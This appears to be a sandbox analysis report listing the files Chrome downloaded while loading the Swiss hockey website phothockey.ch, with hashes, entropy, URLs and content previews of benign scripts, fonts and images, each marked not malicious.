                                                                                                                                            Preview:/*! elementor - v3.5.6 - 28-02-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[882,723,209,745,120,192,520,181,791,268,357],{5526:e=>{e.exports=function _defineProperty(e,t,s){return t in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e},e.exports.default=e.exports,e.exports.__esModule=!0},8470:(e,t,s)=>{"use strict";var n=s(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i=n(s(9728));class Accordion extends i.default{getDefaultSettings(){return{...super.getDefaultSettings(),showTabFn:"slideDown",hideTabFn:"slideUp"}}}t.default=Accordion},9269:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class Alert extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{dismissButton:".elementor-alert-dismiss"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$dismissButton:this.$element.find(e.dismissButton)}}bindEve
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):960
                                                                                                                                            Entropy (8bit):6.761913684855905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B7D920BBD74A8BED8A6BC5DB8A89C5C8
                                                                                                                                            SHA1:49E20182E14E8154DD9C43AB7A04451E15778B2B
                                                                                                                                            SHA-256:2720648472AEF01AEA11CCADF306FADFC56306671407DE378406F22D647C54CC
                                                                                                                                            SHA-512:7D3AFB75B7EE745FD0F21D9B7AB465B508CFA31896C10DC55E5AF8CCE45BD8DE4A4CF550BB702B7403A05E200B2111FBC39DB17CFA41441721A6667FA008CF3A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR... ... .....3..P...)PLTE................................................KJK./9.IR..'........*..#.<F.3>.3=.4>.%0VVV..8...........................HHH333KKKJKK.*5WWW@@@yyyjjjRRR;;;...^^^...........&...777.....!..............................BBBDDD...GGGIIIFFF...KKJ.>H.9DrrrqrrrqrqrqqqrpppaaaLLL.'1.'2.'3.)4.!,.!,......ddd...\......tRNS......... $'DY..%.....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .........._...cIDATx....3.@....}<.%H..T...i.&H...#..&;&...}.}f.....Ph.6h.&..G.[e..\..5F......a...[#.....9U....>.O.4.~.... ....>.4....X....G.~......g.m7n...S..j*...FM.n.N.d.....*.s.."..~Y.......D...Glk....j..c.j'NH.h...d..>~;.[5...M.W5\7...RJ.P...W,..,..,...W...=<..... D^.n...Bd....Z.e..tt...u.."....u....f..-..........G..c.....4....gj.%Z::k.h..6..-b.ab.......IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.383342416951268
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D18A177CA6710FE646C9433FC14ABE6A
                                                                                                                                            SHA1:14C835D913BA603E0FFDA729708538E97A593CCA
                                                                                                                                            SHA-256:310D1BA6794CDCF8DFA3427F464F4113D97C4B9A5FA48499F177EEA61E4B99E8
                                                                                                                                            SHA-512:B02E9D13FF3B7ED1F3D2783AF82F5835ADC7B24CC63F07DD688325224B8AD2F668D3EEF140B41BBE5E0FB4D58DCA758008DF17CEE38FCF485D410BB8D250DA89
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5534394335622311&output=html&h=280&adk=935936864&adf=3472948460&pi=t.aa~a.1043414356~rp.1&w=1200&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177823&rafmt=1&to=qs&pwprc=9468878717&format=1200x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177823302&bpp=2&bdt=2603&idt=431&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0&nras=2&correlator=3048303595490&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=40&ady=170&biw=1280&bih=907&scr_x=0&scr_y=0&eid=31088580%2C95344789%2C95347433&oid=2&pvsid=3658152886269661&tmod=1523322118&uas=0&nvt=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=439
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CN6EuLS24YoDFePiEQgdIAwlFA"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):41016
                                                                                                                                            Entropy (8bit):7.99421984311854
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:005829276EEE658685FBD56B2EF7DB4F
                                                                                                                                            SHA1:2B3060CA3BCAE2A7BC1BAB0653DD49FF7E2D4A43
                                                                                                                                            SHA-256:AC8436E524B91B695A7D2EB125CB4156FB17F0EEA1A53ED19D8763B77D59A24B
                                                                                                                                            SHA-512:9C2F0C90B3719143D2C20D0C26AEB12FD7D7B1ED6516C0339A27DB7C2E30A70C5AFBD9B1F4A13094CF5A9B327EB64428239B924396C8B1A45DB3E690F5AF671B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:800/h:445/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/10/IMG_0495.jpg
                                                                                                                                            Preview:RIFF0...WEBPVP8X..............VP8 P...p....* ...>.D.J...')4.) ..H^:.<..W.R....ZQ...W..K./..................&....6~..7.....O...?...?.~......A.y................%?.z.................#.?....'..?..?.c.C}.je.....%.#._..l./.....^...O...{.{......^...O......1........-...P.......7....g_....c.....?...........GY.I.-.M....Y.o(.!.Hl..*(...8.Y.R..[..2.[1r<.d...j94_Ki..|.Q$....,...._.....u.5..%...b]GA#V..kh.FV.=.#..w.>......a..W.78.U,.../hTa.<r.i,P....6...x.....b.l......c..i....TC..g.b..P/.......`b..f:..%S}.HP...&..M*.0......#...z..z,bVO....!....|tT..7.....'..<..9........?....n...Z..:..T.(.P.K.d.Z.'t.s.@.)<!......5 .*o.D|... .....Uo...=.E....L=.X.....T.A.......Rl......q.^.8...Uw|...?.W'|.%[12|.g.O.t.d.H.j..T...l.NP..hB..gg.;_cu.$T..|....E.J..k..........._!a{S.z`m.p{....l....v..;D...Bs.-.P_....g.p8.K......5..0....#{!..q^|.C..~vwm.....:.5......:.N".[.P.~...{Q...e.+.....$.....7H.....#.+..$..V".....-..M-....Q..j.~.+m*2]K..}.+.BD.$..!.<.0#...c. ......]o....J.....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 18492, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18492
                                                                                                                                            Entropy (8bit):7.988005025098439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:7FDA4C62C1BDEAE7A08E6FD438104BAC
                                                                                                                                            SHA1:B1F626E78F5F6D7BE993303A49EB81F0FA4CE57C
                                                                                                                                            SHA-256:4DBD328E347E890A801D51F9A5F8D38A3EFD51EC34C0AA22CC83D0A95D6D9D71
                                                                                                                                            SHA-512:C4A36A3C1FF23023533DFF103A108844B7CFE4E793ABA0B1B5576431E77DD6E9EDF29FAD68132577AD6AD55CA7A011A38723DA2FA15D9071D2C6BA4E02D1DADC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBBc4.woff2
                                                                                                                                            Preview:wOF2......H<..........G..............................Z..|.`..J.X..<.....P..N..Z...x.6.$..0. ..|. ..:...%l.F.......T.mZ..V.n!.53.l.@..N....CD.!f......I.(;..Cw.2L..@....M....(.H*].......1..I&..tE.e....D...}y..6D.h.Z..$y.J.X._....J2 .*(.....=M..+Hd*.Y.6.f.J.z..:.........#.#...3..;.<..q./.,g.tK.Y.Ne.?......1.b.......S.".~..|Q.9.1Q.Y.^....MkF......;v..g(.(S...Z.>...l.XW.Z....-Q.h..MR8$..W(..Wh.0....X..;]3...:..\/..L...L.U...6".h?K.....A.....(2z.uRTn...GaJ......+..4..d...I.[!..Ua..x..4.,@..t....3.e..J._'..R.j.p.t...`.4.......aI,.....W..9V..K..c..... g...:.........'..6.O.0+..;Q..&..e..=..sg......Eg.2.R.M..{{w.{{'4.L.O2.L$) ;..`....PeW..O..iS..e..S.l... .....R.R.+.!.uLUE~...C.JN..J.r...@..g..:.\..;..s.n.s........sq4... ;..N.`.H<T.....p.#2.e....H..T...........1....^......L.....R...R.1.!............E..m_Z~....z..L..j....".q~..Pg!X}1.q.!.n......@.d...._5=..*x.......[.y.#$Q.d.........j...1n.....&...-(N..P\5<.f.qB..|.i...q<.'..C.A...\.i.x.9........1.>....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (13154)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13155
                                                                                                                                            Entropy (8bit):5.186616228680834
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0EB89CA19C4471EDB661005556332ADC
                                                                                                                                            SHA1:C9901D52C1E09763051EBB233748E61D6864B08D
                                                                                                                                            SHA-256:D9EEF86302B4CAFAA9CEB5705C0791ECFDA2EA2A20D7B9B84ADBE352A1DF7374
                                                                                                                                            SHA-512:8BA67E2991F7731B991F0AF00775D6B5A92D1FCBAD7DFC1AA9DC777D979DEAA48ACDCF14BB2263A130B383B6224F253B3C5E74DED96BD8E604F91721568B7449
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/js-lib/v2/latest/optimole_lib_no_poly.min.js
                                                                                                                                            Preview:!function(){"use strict";class e{constructor(e){let t={root:null,rootMargin:"150px 0px 500px",threshold:this.buildThresholdList(),classTarget:this};this.observer=new IntersectionObserver(e,t)}addToObserver(e){this.observer.observe(e)}removeFromObserver(e){this.observer.unobserve(e)}buildThresholdList(){let e=[];for(let t=1;t<=6;t++){let a=t/6;e.push(a)}return e}}function t(e){let t=e.clientWidth,a=e.attributes.width?e.attributes.width.value:"auto",i=e.attributes.height?e.attributes.height.value:"auto",r="auto"===a||"auto"===i||"100%"===a||"100%"===i?e.clientHeight:parseInt(i/a*t);return t=parseInt(t),r=parseInt(r),isNaN(r)&&(r="auto"),{width:t,height:r}}function a(e,t){if(e.width<=t.width&&e.height<=t.height)return e;const a=Math.min(t.width/e.width,t.height/e.height);return a<1&&(e.width=Math.round(e.width*a),e.height=Math.round(e.height*a)),e}function i(e,t){return Object.keys(t).forEach((function(a){e[a]=t[a]})),e}let r=new class{constructor(){this.serviceDomain=".i.optimole.com",th
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format, TrueType, length 80196, version 3.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):80196
                                                                                                                                            Entropy (8bit):7.991345901031763
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8D5902C75E6F6373B10B9A5AAAD64821
                                                                                                                                            SHA1:CF35548F4F6A03FC63544A78703E61E00FAE45A9
                                                                                                                                            SHA-256:01860D2273448228AE1E9F7B7150E82BDCF98896938CCCD44815F4C1C856204C
                                                                                                                                            SHA-512:75CF2DA22C241E5C9F6D679825A0CEB3A9F2CB038AB852FEF4E8D01B2CDEF43E680852B86C3E15E43C235DABF2871F821251657DFBB1A8E10902A7A1D6234CD0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/fonts/OpenSans-VariableFont.woff
                                                                                                                                            Preview:wOFF......9D................................FFTM..9(...........9GDEF.............%..GPOS......!...L....-GSUB...4........,.1.OS/2.......U...`.@.Ncmap...t.......j..n.cvt ............=?,.fpgm...d...........Zgasp...............#glyf..#....[..R....}head.......6...6..4.hhea.......!...$....hmtx...h........V.B.loca...\...........maxp....... ... ...lname...h.......4....post...@......'n..Qqprep..............{........B|..._.<..................w&Q.......b............x.c`d`.......s..9.M8.0.E..K).............v....._......./.......J....x.c`aY.8.......,...,..t...i...x....AA...........00.....w....?.n.... 9...m@J...."......x..W.pU....9...TH..H.Q.P ...i@b0....T...<.X....l..R;.L$-...P.Q...@.2Pj...J..>2f,.-..i.%p..{.%W2.;...g.>...7a~vS.i.2Q...J=.#T..t..r.'.k..J....Xu'....;...u..@..).e..N.'.!..b)....3?..A.......!X....wL_..}.1UI.e.-.O f..Y~.b[.E..1.%F.F...3~...<g.n.y^....F=.WU..)|.n.f939..Ov....\.r...8.N3*.....o..i.>B..Xok...a.Q.NDe.{..(....?.{..>.....7.W.a..l..n...V.S.B#.@......Do..za..h.r.1.>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16860
                                                                                                                                            Entropy (8bit):7.982251429927261
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:431E4F63D735190ADC9050CD0BBE86E5
                                                                                                                                            SHA1:810A2EFA694B439A357D068169A2EDAFB04A2E07
                                                                                                                                            SHA-256:4A904A7B15E098F4E6DE1FFBF469C54EE3C1C80E06E86B8C3811D3EDB5B3D05A
                                                                                                                                            SHA-512:711344780489F9BCA56D508FEBA939D4A8571837ACCCE20F425E6BEAFCA6848789007019F3AA73D5930DDF11BC94BD2DEA663F82435E2CE18B0492638D2C84B4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/07/IMG_5911.jpg
                                                                                                                                            Preview:RIFF.A..WEBPVP8X..............VP8 .@.......*....>.B.I.......@...h;0.....o.)n.W.y...S..{.....n?...cy.tg....................g./.g....._w...D.....Y.................?....l.I=F.....]..n..w./.<#.....8..o..>.....o.....}....../.....?....@..a>.>.n"%I;...uS.6$S.N7.5.h&...........W.;.Q}k.ojT.........]bk..N.J.o.%s..-.. {.2..f"0........]D.........l\7.....gp....K[4..X....I...|.wr../K.0.d..3.c. pn...<....S...Z..Z4...(.......y....}t.6.=P>...C.z"P.. ...>$.......h..J.t.'8.......6v7.....m......HZ.$[..@]...;"O!..*..L.%}.....9!......y.._5.....'..vX.S<.........\F..Ldg...Q.....aF..&.tTZ h.#.9yO.in .._.:Bg'rb..YI.y.~..Jx.I..k'i.b..9X.pQ.......vr.xR16.h.......N.0......T.@..b.r.'6...X.......G.{j.$1)M...t.....(c.Bw...M9u.1.:.5L.....).R....../K....D.Zt.=..b....^..:.W.3.l.:m..5/`_B.e...J.BHy?.S ......qGA.W.Q..z......E.......a.....C...s....%..,.#`...^.W.}......M..8C.....".r...\?....;....t.`...(.5..Z...j.c{SH<..`.w.. .....kcP3..#..p$....a".C.=9V+f.$4v0}.y?."
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (33162), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):33162
                                                                                                                                            Entropy (8bit):5.37289346010546
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:58A32E9C7E13D219B55813174F369DB4
                                                                                                                                            SHA1:DCE181750AB3A27164CC947F4152E8A93224E69F
                                                                                                                                            SHA-256:2BEB3F375ED798D7445F53FA1EB1E49EB33CFE3C3A5DF86BB31588717417232D
                                                                                                                                            SHA-512:70BFC0BEA2EB0141CC43C247AF0BEB055606C9039596C99C7B7B918CC32814F33B692D65A28C6274B8BFE7EC14E44CEF8BC4C7DC90D49A0CD955E47600B65E19
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://gbucket.ch/CH/GBv2_0/Phothockey_ch/phothockey_ch/Desktop/F_ROS_Banner.js
                                                                                                                                            Preview:(()=>{var e,t,r,i,o={4744:e=>{"use strict";var t=function(e){return function(e){return!!e&&"object"==typeof e}(e)&&!function(e){var t=Object.prototype.toString.call(e);return"[object RegExp]"===t||"[object Date]"===t||function(e){return e.$$typeof===r}(e)}(e)},r="function"==typeof Symbol&&Symbol.for?Symbol.for("react.element"):60103;function i(e,t){return!1!==t.clone&&t.isMergeableObject(e)?a((r=e,Array.isArray(r)?[]:{}),e,t):e;var r}function o(e,t,r){return e.concat(t).map((function(e){return i(e,r)}))}function n(e){return Object.keys(e).concat(function(e){return Object.getOwnPropertySymbols?Object.getOwnPropertySymbols(e).filter((function(t){return Object.propertyIsEnumerable.call(e,t)})):[]}(e))}function s(e,t){try{return t in e}catch(e){return!1}}function a(e,r,l){(l=l||{}).arrayMerge=l.arrayMerge||o,l.isMergeableObject=l.isMergeableObject||t,l.cloneUnlessOtherwiseSpecified=i;var d=Array.isArray(r);return d===Array.isArray(e)?d?l.arrayMerge(e,r,l):function(e,t,r){var o={};return r.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13092
                                                                                                                                            Entropy (8bit):7.976618563388357
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:94095CA8F5742D35042B10AC893E044D
                                                                                                                                            SHA1:0F20421E3EF6A9E8B5BD6F4C1473656252B9D94D
                                                                                                                                            SHA-256:2C0E198E62C2817415CC89323346DCCD35E6E1A941243F4B6D5B9ED88EAD33F0
                                                                                                                                            SHA-512:02BC217989B70D69E4A86CB11B1A678B8BD53759413F687B967FFEA1316B0AAFA69371A1DFD3B9BE0FB52783233439FB878C23704376E186D9C1C2F4A99A3E3B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/02/riviere.jpg
                                                                                                                                            Preview:RIFF.3..WEBPVP8X..............VP8 <2.......*....>.D.I...&.T<....cm_A.[KZ.^?\~4J.#.\.....$........T.).s.7m..........,.[*.[R.g.x....~....Vu...c .A..0]..d{Tz..Q.6..;..@..:F;.Bx.]....c.V.\...Ze]...HH..C.(..IS.....;........?Zz.`.i...\...Z~.3.x.qOn;..._].........2BT1..../(~.A.>..P.}.j:n._..N.KV...|...(...e..^PG..D.$..U..K.{%..y]..:..R.<.@z^xX.F.J.....AKX.!....bx.V....._@q7...y.0a:>%;.U...<.*..:......l_[..&.k..xJ.St.+....Z..sD[|/.m..y...#..K.(....d.E.j......T...e._..J#.8.5g:.f....&.}.....k"..D.VG...C_....}.D.,pB....2.A.S.M....(.7..`.P..w.c...Rab_...v..9.'.......).>.......!......XT..P4..#.....2..W.@.....@...w....*X.i...[.....o..)...4........7+...*....C....CGQ.Jki...=!0...'...<....][.M_.....6.....xO...X Q'.......8......M),...>[.`;....a.\...y.........n8.CA..]5.Y.k.. "JQ.+...G(..V.)........lk'...k.2...a\.LF./...dOq=x&%n..=.o..;4..y.o6......9...B...G..O..J.....~ .z5.EtQ-s+.=.3i%.."..D........G...~*...1S...Z..T.J.I.PO.o.*,=...T#E..K.!.....v
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (64561)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):503867
                                                                                                                                            Entropy (8bit):5.512590647226025
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:14D570E2B18EDB45C60D292320C92D9F
                                                                                                                                            SHA1:F33FB3E83C6894F590C8C9348B11FAC2E6827EE8
                                                                                                                                            SHA-256:04D85FDAA240E9C6964C1B3AFE75B8802720A8D9A98E6C35F346F599B1113AF4
                                                                                                                                            SHA-512:43DD920A68256864EE489B222AC5823F5EB597071E7832D935257E1D484E84146C09BEEEEE384F38CEA25FCF489BED02AB76DE420CD66E9131AC445075F53A69
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ca,ea,ja,xa,za,Ea,Ga,
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):77160
                                                                                                                                            Entropy (8bit):7.996509451516447
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AF7AE505A9EED503F8B8E6982036873E
                                                                                                                                            SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                                                                                                            SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                                                                                                            SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/fontawesome-webfont.woff2?v=4.7.0
                                                                                                                                            Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):23390
                                                                                                                                            Entropy (8bit):7.98864407686591
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:F64D78E4634FEEB82ADD9F6BEA4BF8CA
                                                                                                                                            SHA1:664B073C72DC721EF31A2742C09C06008BE9A7EE
                                                                                                                                            SHA-256:547D8D753012E298F40FD37375318537E14D4C26739191927D69C84B4041BEF9
                                                                                                                                            SHA-512:4853E37845684F75A0956E59AAFCF4C7E7D0EC870348A8CB584114C00AB80118C1CA5E1846C6DEB59400A73CADF12DC9823954D93C9A87890F759581FA4EBCE2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_9850.jpg
                                                                                                                                            Preview:RIFFV[..WEBPVP8X..............VP8 vZ..p"...*....>.>.H%..#..M...fk.....P...............g.|..O..x....y........`O.oS?.=i.s.....'....{_G_..A.....C.........i.....3.3.......7?..?.?......Az?...........}./.....OD..0.?.z.{...._V.....K............+.c....p>........u.O.....f:..M.q.....wU..L_.|.'...x..O......75.....u...*...k.;E.QA"]k.N...W...bM........g..m..u.o..N/..6.....8.q J.d..z8.pgH..a.jxwLH0F.$.R9.1.jZ...!......dU.HZQ..4*#.^.R.._r....#.....W.I3,..Qg.U..5o+......)D...|..-no.....UBo......i.-@`..q..h W.&........R33c 1Z../.U.(..aa.No...........n.xVh.6.c#...(.O...OS.7I.......o.*@....p..^....t.&..Z..!k......U.:._.I...5....~D....\...C.5.KO(.^|q.....iZ.P...5+.(.z..N..|.).L...U....l...!.........I..HsV<p.O.....o?..>"@......>.YS.Fo...y..W.6...`#.>^..<...*......[~...K..p}1Aox..Y|....Z.pvxsU. ......&'..........1.......z.. V.`hP6..=.i%..r..X..].L^..W...7....0...........L..i)............E.1s...6.T.*..]..G....T..=Zm....h1.H..I.h..N..N....p.1...5........h
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1058), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1058
                                                                                                                                            Entropy (8bit):4.864984618093748
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6F71106C7A6D664E95DF0B3381AB7A53
                                                                                                                                            SHA1:3AA8DDCEC63FDD455BD8A4CCB34DA371DC17B10B
                                                                                                                                            SHA-256:0D585AEBB9CB31821FBCC6B030E0D882B5639E17BB403F8EB5CE7B3B19F4A1C9
                                                                                                                                            SHA-512:0F399B5D008380AD0DDEF3328E344B23711DFC88817BFD3A303AEC684263CEB4FA4C6CA92B48F0F20D6257F0924F441EFA3D90E6A6389759D9C8BA49B00A38A0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/post-views-counter/css/frontend.min.css?ver=1.4.8
